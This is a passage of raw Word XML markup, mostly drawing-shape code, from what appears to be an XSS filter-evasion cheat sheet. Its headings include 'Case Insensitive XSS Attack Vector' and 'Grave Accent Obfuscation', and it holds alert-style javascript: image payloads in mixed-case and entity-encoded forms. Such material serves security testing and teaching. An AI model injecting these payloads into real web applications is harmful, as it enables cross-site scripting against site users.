                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3111"/>
                              <a:gd name="T6" fmla="+- 0 347 165"/>
                              <a:gd name="T7" fmla="*/ 347 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3111"/>
                              <a:gd name="T10" fmla="+- 0 346 165"/>
                              <a:gd name="T11" fmla="*/ 346 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3111"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3111"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3111"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3111"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4704 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3111"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4725 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3111"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4725 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3111"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4707 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3111"/>
                              <a:gd name="T42" fmla="+- 0 346 165"/>
                              <a:gd name="T43" fmla="*/ 346 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4704 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3111"/>
                              <a:gd name="T46" fmla="+- 0 347 165"/>
                              <a:gd name="T47" fmla="*/ 34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111" h="183">
                                <a:moveTo>
                                  <a:pt x="30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090" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3111" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3111" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3093" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30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Text Box 140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4"/>
                            <a:ext cx="311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0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SRC="javascript:alert('XSS');"&gt;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02" o:spid="_x0000_s1035" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:155.55pt;height:9.15pt;z-index:-15727104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="311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">
                <v:shape id="Freeform 1404" o:spid="_x0000_s1036" style="position:absolute;left:1614;top:164;width:3111;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="311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h6pcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0VjcRKTW6ijQI0tJD1Yu3ITtm&#10;Q7KzaXZ103/fLQje5vE+Z7kebSeuNPjGsYJ8koEgrpxuuFZwPGxf3kD4gKyxc0wKfsnDevX4sMRC&#10;u8jfdN2HWqQQ9gUqMCH0hZS+MmTRT1xPnLizGyyGBIda6gFjCrednGbZq7TYcGow2NO7oardX6yC&#10;y/b0WZZfpqK8j+1PW8b8Yx6Ven4aNwsQgcZwF9/cO53mz7Ip/H+TTp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IeqXEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3090,182l21,182r-3,-1l,161r,-3l,21,21,,3090,r21,21l3111,161r-18,20l3090,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3090,347;21,347;18,346;0,326;0,323;0,186;21,165;3090,165;3111,186;3111,326;3093,346;3090,347" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1403" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:1614;top:164;width:311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VT1sQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQq91aS2SLs1ioiCUJCu20OP0824&#10;G9xM1k3U9d8boeBtHu9zJrPeNeJEXbCeNbwMFQji0hvLlYafYvX8DiJEZIONZ9JwoQCz6eBhgpnx&#10;Z87ptI2VSCEcMtRQx9hmUoayJodh6FvixO185zAm2FXSdHhO4a6RI6XG0qHl1FBjS4uayv326DTM&#10;fzlf2sPm7zvf5bYoPhR/jfdaPz32808Qkfp4F/+71ybNf1OvcPsmnS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FU9b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70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SRC="javascript:alert('XSS');"&gt;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No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Quotes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Semicolon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1813560" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1398" name="Group 1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3560" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="2856" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1399" name="Freeform 1401"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="2856" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4449 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2856"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2856"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2856"/>
                              <a:gd name="T10" fmla="+- 0 424 242"/>
                              <a:gd name="T11" fmla="*/ 424 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2856"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2856"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2856"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2856"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4449 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2856"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4470 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2856"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4470 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2856"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4452 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2856"/>
                              <a:gd name="T42" fmla="+- 0 424 242"/>
                              <a:gd name="T43" fmla="*/ 424 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4449 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2856"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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856" h="183">
                                <a:moveTo>
                                  <a:pt x="283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835" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2856" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2856" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2838" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="283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" name="Text Box 1400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1"/>
                            <a:ext cx="285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SRC=javascript:alert('XSS'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)&gt;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99" o:spid="_x0000_s1038" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:142.8pt;height:9.15pt;z-index:-15726592;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="285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">
                <v:shape id="Freeform 1401" o:spid="_x0000_s1039" style="position:absolute;left:1614;top:241;width:2856;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="285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GkKcYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86UZrS01dRStiQYzUlp6n2TEJ&#10;ZmdDdo3RX+8Khd7m8T5nMmtNKRqqXWFZwaAfgSBOrS44U/D9teq9gnAeWWNpmRRcyMFs+tCZYKzt&#10;mT+p2ftMhBB2MSrIva9iKV2ak0HXtxVx4A62NugDrDOpazyHcFPKYRS9SIMFh4YcK3rPKT3uT0bB&#10;bzJMVtv1ddlsf+ab0W63SMrnVqnuYzt/A+Gp9f/iP/eHDvOfxmO4fxNO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GkKcYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m2835,182l21,182r-3,l,161r,-3l,21,21,,2835,r21,21l2856,161r-18,21l2835,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2835,424;21,424;18,424;0,403;0,400;0,263;21,242;2835,242;2856,263;2856,403;2838,424;2835,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1400" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:285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fNocYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUsDMRCF70L/Q5iCN5tUpNi1aSlFQRDE7fbQ47iZ&#10;7oZuJusmtuu/dw6Ctxnem/e+WW3G0KkLDclHtjCfGVDEdXSeGwuH6uXuEVTKyA67yGThhxJs1pOb&#10;FRYuXrmkyz43SkI4FWihzbkvtE51SwHTLPbEop3iEDDLOjTaDXiV8NDpe2MWOqBnaWixp11L9Xn/&#10;HSxsj1w++6/3z4/yVPqqWhp+W5ytvZ2O2ydQmcb8b/67fnWC/2CEX76REf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fNoc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6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SRC=javascript:alert('XSS'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)&gt;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spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Insensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1813560" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1395" name="Group 1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3560" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="2856" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1396" name="Freeform 1398"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="2856" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4449 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2856"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2856"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2856"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2856"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2856"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2856"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2856"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4449 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2856"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4470 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2856"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4470 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2856"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4452 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2856"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4449 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2856"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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856" h="183">
                                <a:moveTo>
                                  <a:pt x="283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835" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2856" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2856" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2838" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="283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Text Box 139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1"/>
                            <a:ext cx="285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SRC=JaVaScRiPt:alert('XSS')&gt;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96" o:spid="_x0000_s1041" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:142.8pt;height:9.15pt;z-index:-15726080;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="285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">
                <v:shape id="Freeform 1398" o:spid="_x0000_s1042" style="position:absolute;left:1614;top:241;width:2856;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="285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4wW8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22rCQBB9L/gPywh9q5taKxpdxVakhWLECz6P2WkS&#10;mp0N2TWm/Xq3IPg2h3Od6bw1pWiodoVlBc+9CARxanXBmYLDfvU0AuE8ssbSMin4JQfzWedhirG2&#10;F95Ss/OZCCHsYlSQe1/FUro0J4OuZyviwH3b2qAPsM6krvESwk0p+1E0lAYLDg05VvSeU/qzOxsF&#10;p6SfrNYff8tmfVx8DTabt6R8bZV67LaLCQhPrb+Lb+5PHea/jIfw/004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O4wW8YAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m2835,182l21,182r-3,-1l,161r,-3l,21,21,,2835,r21,21l2856,161r-18,20l2835,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2835,424;21,424;18,423;0,403;0,400;0,263;21,242;2835,242;2856,263;2856,403;2838,423;2835,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1397" o:spid="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:285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4NN8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYTedGMLVlNXEVEoCGJMDz1Os2Oy&#10;mJ1Ns1uN/94VCt7m8T5nvuxsLS7UeuNYwXiUgCAunDZcKvjKt8MpCB+QNdaOScGNPCwX/d4cU+2u&#10;nNHlGEoRQ9inqKAKoUml9EVFFv3INcSRO7nWYoiwLaVu8RrDbS1fk2QiLRqODRU2tK6oOB//rILV&#10;N2cb87v/OWSnzOT5LOHd5KzUy6BbfYAI1IWn+N/9qeP8t9k7PL6JJ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4NN8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6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SRC=JaVaScRiPt:alert('XSS')&gt;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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Entities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72"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>semicolons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required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work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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2345690" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1392" name="Group 1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5690" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="3694" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1393" name="Freeform 1395"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="3694" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5287 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3694"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3694"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3694"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3694"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3694"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3694"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3694"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5287 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3694"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5308 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3694"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5308 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3694"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5290 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3694"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5287 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3694"/>
                              <a:gd name="T46" fmla="+- 0 422 240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694" h="183">
                                <a:moveTo>
                                  <a:pt x="367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673" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3676" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="367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Text Box 1394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0"/>
                            <a:ext cx="369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SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;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93" o:spid="_x0000_s1044" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:184.7pt;height:9.15pt;z-index:-15725056;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="369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">
                <v:shape id="Freeform 1395" o:spid="_x0000_s1045" style="position:absolute;left:1614;top:240;width:3694;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="369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plicQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBCF78L+hzAL3jRVQWw1iix01eOqu+ehGdti&#10;M6lNrNVfbxYEbzO89755s1h1phItNa60rGA0jEAQZ1aXnCs4HtLBDITzyBory6TgTg5Wy4/eAhNt&#10;b/xD7d7nIkDYJaig8L5OpHRZQQbd0NbEQTvZxqAPa5NL3eAtwE0lx1E0lQZLDhcKrOmroOy8v5pA&#10;2aTH3WWafp/bPxpfHr+x8bFWqv/ZrecgPHX+bX6ltzrUn8QT+P8mjC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aZYnEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3673,182l21,182r-3,l,161r,-3l,21,21,,3673,r21,21l3694,161r-18,21l3673,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3673,422;21,422;18,422;0,401;0,398;0,261;21,240;3673,240;3694,261;3694,401;3676,422;3673,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1394" o:spid="_x0000_s1046" type="#_x0000_t202" style="position:absolute;left:1614;top:240;width:369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yTQMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y2tiKauIqJQEMSYHnqcZsdk&#10;MTubZrca/70rCN7m8T5ntuhsLc7UeuNYwXCQgCAunDZcKvjON28TED4ga6wdk4IreVjMey8zTLW7&#10;cEbnQyhFDGGfooIqhCaV0hcVWfQD1xBH7uhaiyHCtpS6xUsMt7V8T5KxtGg4NlTY0Kqi4nT4twqW&#10;P5ytzd/ud58dM5Pn04S345NSr/1u+QkiUBee4of7S8f5H9MR3L+JJ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4yTQM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8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SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;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Grave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Accent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Obfuscation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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="21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420370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="262890"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1389" name="Group 1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262890"/>
                          <a:chOff x="1614" y="662"/>
                          <a:chExt cx="8700" cy="414"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1390" name="Freeform 1392"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="662"/>
                            <a:ext cx="8700" cy="414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1075 662"/>
                              <a:gd name="T3" fmla="*/ 1075 h 414"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1075 662"/>
                              <a:gd name="T7" fmla="*/ 1075 h 414"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1075 662"/>
                              <a:gd name="T11" fmla="*/ 1075 h 414"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1054 662"/>
                              <a:gd name="T15" fmla="*/ 1054 h 414"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1051 662"/>
                              <a:gd name="T19" fmla="*/ 1051 h 414"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 683 662"/>
                              <a:gd name="T23" fmla="*/ 683 h 414"/>
